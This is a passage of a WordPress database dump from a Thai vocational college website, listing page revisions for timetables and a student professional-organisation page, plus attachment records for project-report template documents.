(2552, 4, '2018-05-19 11:19:15', '2018-05-19 04:19:15', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1WbH942zCtIGYtEoJvKeABxvxYMSdCZ5u\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการท่องเที่ยว', '', 'inherit', 'closed', 'closed', '', '2286-autosave-v1', '', '', '2018-05-19 11:19:15', '2018-05-19 04:19:15', '', 2286, 'http://www.technicrayong.ac.th/2286-autosave-v1/', 0, 'revision', '', 0),
(2553, 4, '2018-05-19 11:19:30', '2018-05-19 04:19:30', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1yhWxgG2BObpsRSiURW2iSvg3IlxAMAWv\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางสาขาวิชาเทคโนโลยีสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '2294-autosave-v1', '', '', '2018-05-19 11:19:30', '2018-05-19 04:19:30', '', 2294, 'http://www.technicrayong.ac.th/2294-autosave-v1/', 0, 'revision', '', 0),
(2555, 3, '2018-05-21 16:17:43', '2018-05-21 09:17:43', '<h3><img class=\"aligncenter size-medium wp-image-2787\" src=\"/wp-content/uploads/2018/05/อ.ฉัตรเฉลิม-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2788\" src=\"/wp-content/uploads/2018/05/นายก-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2789\" src=\"/wp-content/uploads/2018/05/รอง-2-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter wp-image-2790 size-full\" src=\"/wp-content/uploads/2018/05/28-5-2561-11-05-34.jpg\" alt=\"\" width=\"835\" height=\"630\" /></h3>\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ</span> <a href=\"/ตัวอย่างรูปเล่มรายงานช\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบ อวท. 1-36 <a href=\"/แบบ-อวท-1-36\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์มอื่นๆ ขององค์การนักวิชาชีพฯ <a href=\"/แบบฟอร์มอื่นๆ-ของงานองค\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>\r\n<h3><span style=\"color: #0000ff;\">แนวปฏิบัติ อวท. <a href=\"/wp-content/uploads/2018/08/3.แนวปฏิบัติของ-อวท.-.doc\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'publish', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b9%8c%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%9e%e0%b9%83%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b2', '', '', '2018-08-18 13:33:09', '2018-08-18 06:33:09', '', 0, 'http://www.technicrayong.ac.th/?page_id=2555', 0, 'page', '', 0),
(2556, 3, '2018-05-21 16:17:43', '2018-05-21 09:17:43', '<h3><span style=\"color: #0000ff;\">ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ</span> <span style=\"color: #ff0000;\">>>>คลิกที่นี่<<<</span></h3>', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'inherit', 'closed', 'closed', '', '2555-revision-v1', '', '', '2018-05-21 16:17:43', '2018-05-21 09:17:43', '', 2555, 'http://www.technicrayong.ac.th/2555-revision-v1/', 0, 'revision', '', 0),
(2558, 3, '2018-05-21 16:36:10', '2018-05-21 09:36:10', '<h3><a href=\"/wp-content/uploads/2018/05/ปกโครงการ.pdf\">1 ปกโครงการ</a></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2-บทคัดย่อ.docx\">2 บทคัดย่อ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2.1กิตติกรรมประกาศ.docx\">2.1 กิตติกรรมประกาศ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/3-คำนำ.docx\">3 คำนำ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.1-สารบัญ.docx\">4.1 สารบัญ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.2-สารบัญตาราง.docx\">4.2 สารบัญตาราง</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.3-สารบัญภาพ.docx\">4.3 สารบัญภาพ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.1-บทที่-1-โครงการ.doc\">5.1 บทที่ 1 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.2-บทที่2โครงการ.doc\">5.2 บทที่ 2 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.3-บทที่-3-โครงการ.doc\">5.3 บทที่ 3 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.4-บทที่-4-โครงการ.docx\">5.4 บทที่ 4 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.5-บทที่-5-โครงการ.docx\">5.5 บทที่ 5 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/6-รายงานผลโครงการ.docx\">6 รายงานผลโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7-คำสั่งองค์การ.docx\">7 คำสั่งองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7.1-ประกาศองค์การ-แก้ไข.docx\">7.1 ประกาศองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx\">8 ขอเชิญประชุมคณะกรรมการดำเนินงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8.1-ขออนุญาตจัดประชุม.docx\">8.1 ขออนุญาตจัดประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/9-บันทึกการประชุม.docx\">9 บันทึกการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/10-รายงานการประชุม.docx\">10 รายงานการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/11-ลงลายมือชื่อการประชุม.docx\">11 ลงลายมือชื่อการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/12-รายงานการประชุมเขียนแล้ว.docx\">12 รายงานการประชุมเขียนแล้ว</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx\">13 ขอความอนุเคราะห์ประชาสัมพันธ์ R 1</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14-ขออนุญาตประชาสัมพันธ์.docx\">14 ขออนุญาตประชาสัมพันธ์</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx\">14.1 สถานีวิทยุ R-radio 101.00 MHz R 2</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx\">14.2 การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx\">14.3 การเชิญเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx\">14.4 แจ้งข่าวสารผ่านสื่อออนไลน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/15.กำหนดการโครงการ.doc\">15 กำหนดการโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx\">16 แบบลงทะเบียนเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.1-สรุปสมาชิกทั้งหมด.docx\">16.1 สรุปสมาชิกทั้งหมด</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc\">16.2 ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/17-คำกล่าวของพิธีกร.doc\">17 คำกล่าวของพิธีกร</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx\">18 สรุปและรายงานผลการปฏิบัติงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx\">19 ภาพที่ ๑ แสดงภาพบรรยากาศของโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx\">19.1 ป้ายบนแผนกโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.2-แบบสอบถามโครงการ.docx\">19.2 แบบสอบถามโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.3-รูปโครงการ.doc\">19.3 รูปโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.4-บรรณานุกรม.docx\">19.4 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.5-บรรณานุกรม-1.docx\">19.5 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/20-คั่นหน้า.docx\">20 คั่นหน้า</a></span></h3>\r\n<h3></h3>\r\n ', 'ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b1%e0%b8%a7%e0%b8%ad%e0%b8%a2%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a3%e0%b8%b9%e0%b8%9b%e0%b9%80%e0%b8%a5%e0%b9%88%e0%b8%a1%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%8a', '', '', '2018-05-21 16:46:20', '2018-05-21 09:46:20', '', 0, 'http://www.technicrayong.ac.th/?page_id=2558', 0, 'page', '', 0),
(2559, 3, '2018-05-21 16:21:18', '2018-05-21 09:21:18', '', '1 ปกโครงการ', '', 'inherit', 'closed', 'closed', '', '1-%e0%b8%9b%e0%b8%81%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:21:18', '2018-05-21 09:21:18', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/1-ปกโครงการ.jpg', 0, 'attachment', 'image/jpeg', 0),
(2560, 3, '2018-05-21 16:21:28', '2018-05-21 09:21:28', '', '2 บทคัดย่อ', '', 'inherit', 'closed', 'closed', '', '2-%e0%b8%9a%e0%b8%97%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b8%a2%e0%b9%88%e0%b8%ad', '', '', '2018-05-21 16:21:28', '2018-05-21 09:21:28', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/2-บทคัดย่อ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2561, 3, '2018-05-21 16:21:32', '2018-05-21 09:21:32', '', '2.1กิตติกรรมประกาศ', '', 'inherit', 'closed', 'closed', '', '2-1%e0%b8%81%e0%b8%b4%e0%b8%95%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8', '', '', '2018-05-21 16:21:32', '2018-05-21 09:21:32', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/2.1กิตติกรรมประกาศ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2562, 3, '2018-05-21 16:21:36', '2018-05-21 09:21:36', '', '3 คำนำ', '', 'inherit', 'closed', 'closed', '', '3-%e0%b8%84%e0%b8%b3%e0%b8%99%e0%b8%b3', '', '', '2018-05-21 16:21:36', '2018-05-21 09:21:36', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/3-คำนำ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2563, 3, '2018-05-21 16:21:40', '2018-05-21 09:21:40', '', '4.1 สารบัญ', '', 'inherit', 'closed', 'closed', '', '4-1-%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%b1%e0%b8%8d', '', '', '2018-05-21 16:21:40', '2018-05-21 09:21:40', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/4.1-สารบัญ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2564, 3, '2018-05-21 16:21:43', '2018-05-21 09:21:43', '', '4.2 สารบัญตาราง', '', 'inherit', 'closed', 'closed', '', '4-2-%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87', '', '', '2018-05-21 16:21:43', '2018-05-21 09:21:43', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/4.2-สารบัญตาราง.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2565, 3, '2018-05-21 16:21:47', '2018-05-21 09:21:47', '', '4.3 สารบัญภาพ', '', 'inherit', 'closed', 'closed', '', '4-3-%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%b1%e0%b8%8d%e0%b8%a0%e0%b8%b2%e0%b8%9e', '', '', '2018-05-21 16:21:47', '2018-05-21 09:21:47', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/4.3-สารบัญภาพ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2566, 3, '2018-05-21 16:21:52', '2018-05-21 09:21:52', '', '5.1 บทที่ 1 โครงการ', '', 'inherit', 'closed', 'closed', '', '5-1-%e0%b8%9a%e0%b8%97%e0%b8%97%e0%b8%b5%e0%b9%88-1-%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:21:52', '2018-05-21 09:21:52', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/5.1-บทที่-1-โครงการ.doc', 0, 'attachment', 'application/msword', 0),
(2567, 3, '2018-05-21 16:21:56', '2018-05-21 09:21:56', '', '5.2 บทที่2โครงการ', '', 'inherit', 'closed', 'closed', '', '5-2-%e0%b8%9a%e0%b8%97%e0%b8%97%e0%b8%b5%e0%b9%882%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:21:56', '2018-05-21 09:21:56', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/5.2-บทที่2โครงการ.doc', 0, 'attachment', 'application/msword', 0),
(2568, 3, '2018-05-21 16:22:00', '2018-05-21 09:22:00', '', '5.3 บทที่ 3 โครงการ', '', 'inherit', 'closed', 'closed', '', '5-3-%e0%b8%9a%e0%b8%97%e0%b8%97%e0%b8%b5%e0%b9%88-3-%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:22:00', '2018-05-21 09:22:00', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/5.3-บทที่-3-โครงการ.doc', 0, 'attachment', 'application/msword', 0),
(2569, 3, '2018-05-21 16:22:05', '2018-05-21 09:22:05', '', '5.4 บทที่ 4 โครงการ', '', 'inherit', 'closed', 'closed', '', '5-4-%e0%b8%9a%e0%b8%97%e0%b8%97%e0%b8%b5%e0%b9%88-4-%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:22:05', '2018-05-21 09:22:05', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/5.4-บทที่-4-โครงการ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2570, 3, '2018-05-21 16:22:11', '2018-05-21 09:22:11', '', '5.5 บทที่ 5 โครงการ', '', 'inherit', 'closed', 'closed', '', '5-5-%e0%b8%9a%e0%b8%97%e0%b8%97%e0%b8%b5%e0%b9%88-5-%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:22:11', '2018-05-21 09:22:11', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/5.5-บทที่-5-โครงการ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2571, 3, '2018-05-21 16:22:16', '2018-05-21 09:22:16', '', '6 รายงานผลโครงการ', '', 'inherit', 'closed', 'closed', '', '6-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:22:16', '2018-05-21 09:22:16', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/6-รายงานผลโครงการ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2572, 3, '2018-05-21 16:22:19', '2018-05-21 09:22:19', '', '7 คำสั่งองค์การ', '', 'inherit', 'closed', 'closed', '', '7-%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b9%8c%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:22:19', '2018-05-21 09:22:19', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/7-คำสั่งองค์การ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2573, 3, '2018-05-21 16:22:24', '2018-05-21 09:22:24', '', '7.1 ประกาศองค์การ (แก้ไข)', '', 'inherit', 'closed', 'closed', '', '7-1-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b9%8c%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b9%81%e0%b8%81%e0%b9%89%e0%b9%84%e0%b8%82', '', '', '2018-05-21 16:22:24', '2018-05-21 09:22:24', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/7.1-ประกาศองค์การ-แก้ไข.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2574, 3, '2018-05-21 16:22:26', '2018-05-21 09:22:26', '', '8 ขอเชิญประชุมคณะกรรมการดำเนินงาน', '', 'inherit', 'closed', 'closed', '', '8-%e0%b8%82%e0%b8%ad%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%8d%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:22:26', '2018-05-21 09:22:26', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2575, 3, '2018-05-21 16:22:28', '2018-05-21 09:22:28', '', '8.1 ขออนุญาตจัดประชุม', '', 'inherit', 'closed', 'closed', '', '8-1-%e0%b8%82%e0%b8%ad%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%8d%e0%b8%b2%e0%b8%95%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1', '', '', '2018-05-21 16:22:28', '2018-05-21 09:22:28', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/8.1-ขออนุญาตจัดประชุม.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2576, 3, '2018-05-21 16:22:30', '2018-05-21 09:22:30', '', '9 บันทึกการประชุม', '', 'inherit', 'closed', 'closed', '', '9-%e0%b8%9a%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b6%e0%b8%81%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1', '', '', '2018-05-21 16:22:30', '2018-05-21 09:22:30', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/9-บันทึกการประชุม.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2577, 3, '2018-05-21 16:22:36', '2018-05-21 09:22:36', '', '10 รายงานการประชุม', '', 'inherit', 'closed', 'closed', '', '10-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1', '', '', '2018-05-21 16:22:36', '2018-05-21 09:22:36', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/10-รายงานการประชุม.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2578, 3, '2018-05-21 16:22:40', '2018-05-21 09:22:40', '', '11 ลงลายมือชื่อการประชุม', '', 'inherit', 'closed', 'closed', '', '11-%e0%b8%a5%e0%b8%87%e0%b8%a5%e0%b8%b2%e0%b8%a2%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1', '', '', '2018-05-21 16:22:40', '2018-05-21 09:22:40', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/11-ลงลายมือชื่อการประชุม.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2579, 3, '2018-05-21 16:22:45', '2018-05-21 09:22:45', '', '12 รายงานการประชุมเขียนแล้ว', '', 'inherit', 'closed', 'closed', '', '12-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%82%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%81', '', '', '2018-05-21 16:22:45', '2018-05-21 09:22:45', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/12-รายงานการประชุมเขียนแล้ว.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2580, 3, '2018-05-21 16:22:49', '2018-05-21 09:22:49', '', '13 ขอความอนุเคราะห์ประชาสัมพันธ์ R 1', '', 'inherit', 'closed', 'closed', '', '13-%e0%b8%82%e0%b8%ad%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b2%e0%b8%b0%e0%b8%ab%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2', '', '', '2018-05-21 16:22:49', '2018-05-21 09:22:49', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
